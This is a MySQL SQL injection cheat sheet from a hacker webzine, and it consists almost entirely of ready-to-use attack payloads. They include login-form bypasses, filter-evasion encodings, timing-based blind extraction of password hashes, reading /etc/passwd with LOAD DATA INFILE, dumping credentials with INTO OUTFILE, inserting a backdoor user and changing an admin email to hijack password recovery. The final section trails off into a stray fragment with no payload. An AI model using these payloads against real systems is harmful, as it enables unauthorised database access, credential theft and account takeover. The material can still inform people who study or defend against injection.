The Hacker Webzine.

SQL Injection cheat sheet



A collection of known and working SQL vectors. These vectors are designed and tested by me on my localhost. I kept the list clean and concise tested for all MySQL versions to date unless stated otherwise. This sheet is under constant development, please come back often. Note that most of these vectors can be used on SQL server or Oracle but mainly it is written and tested for MySQL only. What I give you here is basicly everything you ever need to know about MySQL injection. You have to construct the pieces yourself and probably need to know what they do in order to use them.

To see real world examples I constructed with the cheat sheet see the following pages:


SQL Encoding Injection:
http://www.0x000000.com/?i=120&bin=1111000
Attacking Stored procedures:
http://www.0x000000.com/?i=148&bin=10010100
Remote SQL hash extractor:
http://www.0x000000.com/?i=173&bin=10101101


Basics

SELECT * FROM login /* foobar */
SELECT * FROM login WHERE id = 1 or 1=1
SELECT * FROM login WHERE id = 1 or 1=1 AND user LIKE "%root%"

Use inside login form:

1' OR 1=1--
1' OR '1' = '1

Variations:

SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1
SELECT * FROM login WHE/**/RE id = 1 o/**/r 1=1 A/**/ND user L/**/IKE "%root%"

SHOW TABLES
SELECT * FROM login WHERE id = 1 or 1=1 AND SHOW TABLES

SELECT VERSION
SELECT * FROM login WHERE id = 1 or 1=1 AND SELECT VERSION()

SELECT host,user,db from mysql.db
SELECT * FROM login WHERE id = 1 or 1=1 AND select host,user,db from mysql.db;

Blind injection vectors collection

Operators

SELECT 1 && 1;
SELECT 1 || 1;
SELECT 1 XOR 0;

Evaluate

all render TRUE or 1.
SELECT 0.1 <= 2;
SELECT 2 >= 2;
SELECT ISNULL(1/0);

Math

SELECT FLOOR(7 + (RAND() * 5));
SELECT ROUND(23.298, -1);

Misc

SELECT LENGTH(COMPRESS(REPEAT('a',1000)));
SELECT MD5('abc');

Benchmark

SELECT BENCHMARK(10000000,ENCODE('abc','123'));
(this takes around 5 sec on a localhost)

SELECT BENCHMARK(1000000,MD5(CHAR(116)))
(this takes around 7 sec on a localhost)

SELECT BENCHMARK(10000000,MD5(CHAR(116)))
(this takes around 70 sec on a localhost!)

Using the timeout to check if user exists
SELECT IF( user = 'root', BENCHMARK(1000000,MD5( 'x' )),NULL) FROM login

Beware of of the N rounds, add an extra zero and it could stall or crash your browser!

Gathering info.

Table mapping

SELECT COUNT(*) FROM tablename

Field mapping

SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user LIKE "%"
SELECT * FROM tablename WHERE user = 'root' AND id IS NOT NULL;
SELECT * FROM tablename WHERE user = 'x' AND id IS NULL;

User mapping

SELECT * FROM tablename WHERE email = '[email protected]';
SELECT * FROM tablename WHERE user LIKE "%root%"
SELECT * FROM tablename WHERE user = 'username'

Advanced SQL vectors

Writing info into files.

SELECT password FROM tablename WHERE username = 'root' INTO OUTFILE '/path/location/on/server/www/passes.txt'

Writing info into files without single quotes: (example)

SELECT password FROM tablename WHERE username = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
CHAR( 39)) INTO OUTFILE CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),
CHAR( 39))

Note: You must specify a new file, it may not exists and give the correct pathname.

The CHAR() quoteless function.

SELECT * FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),
CHAR(110),CHAR( 39))

SELECT * FROM login WHERE user = CHAR(39,97,39)

Extracting hashes

SELECT user FROM login WHERE user = 'root'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login

This evaluates the first char of the password hash from user 'root' which is 'a' (ASCII 97). 

The hash is max 32 chars, and for every chars you'll need to execute the query with CHAR()

The way to extract hashes is done this way if single quotes are allowed,
see beneath it a quoteless example

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(pass,1,1) = CHAR(97), BENCHMARK(1000000,MD5('x')),null) FROM login

SELECT user FROM login WHERE user = 'admin'
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5('x')),null) FROM login 

where: (passwordfield,startcharacter,selectlength)

is like: (password,1,2) this selects: 'ab' 
is like: (password,1,3) this selects: 'abc' 
is like: (password,1,4) this selects: 'abcd' 

A quoteless example:

SELECT user FROM login WHERE user = CONCAT(CHAR(39),CHAR(97),CHAR(100),CHAR(109),CHAR(105),CHAR(110),CHAR( 39))
UNION SELECT IF(SUBSTRING(pass,1,2) = CHAR(97,97), BENCHMARK(1000000,MD5(CHAR(59))),null) FROM login 

Possible chars

0 to 9 - ASCII 48 to 57 ~ a to z - ASCII 97 to 122

Misc.

Insert a new user into DB
INSERT INTO login SET user = 'r00t', pass = 'abc'

Retrieve /etc/passwd file, put it into a field and insert a new user.
load data infile "/etc/passwd" INTO table login (profiletext, @var1) SET user = 'r00t', pass = 'abc'

Then login!

Write the DB user away into tmp
SELECT host,user,password FROM user into outfile '/tmp/passwd';

Change admin e-mail, for "forgot login retrieval." 
UPDATE users set email = '[email protected]' WHERE email = '[email protected]';

Bypassing PHP functions

Bypassing addslashes() with GBK HEX encoding.
WHERE x = 0xbf27 admin 0xbf27

Using an HEX encoded query to bypass escaping.
Normal: SELECT * FROM login WHERE user = 'root'
Bypass: SELECT * FROM login WHERE user = 0x726F6F74

Inserting a new user in SQL.

Normal: insert into login set user = 'root', pass = 'root'
Bypass: insert into login set user = 0x726F6F74, pass = 0x726F6F74

How to determin the HEX value for injection.

SELECT HEX('root'); gives you: 726F6F74. then add: 0x before it.

With comments.

S/**/E/**/L/**/E/**/C/**/T * F/**/R/**/O/**/M l/**/o/**/g/**/i/**/n
W/**/H/**/E/**/R/**/E u/**/s/**/e/**/r = 0x726F6F74

Bypassing mysql_real_escape_string() with BIG5 or GBK

"injection string" に関する追加情報:

(MySQL 4.1.x before 4.1.20 and 5.0.x)


advertisements.
$version web0.1 of course, most secure in Opera, lynx or the off-by-one browser.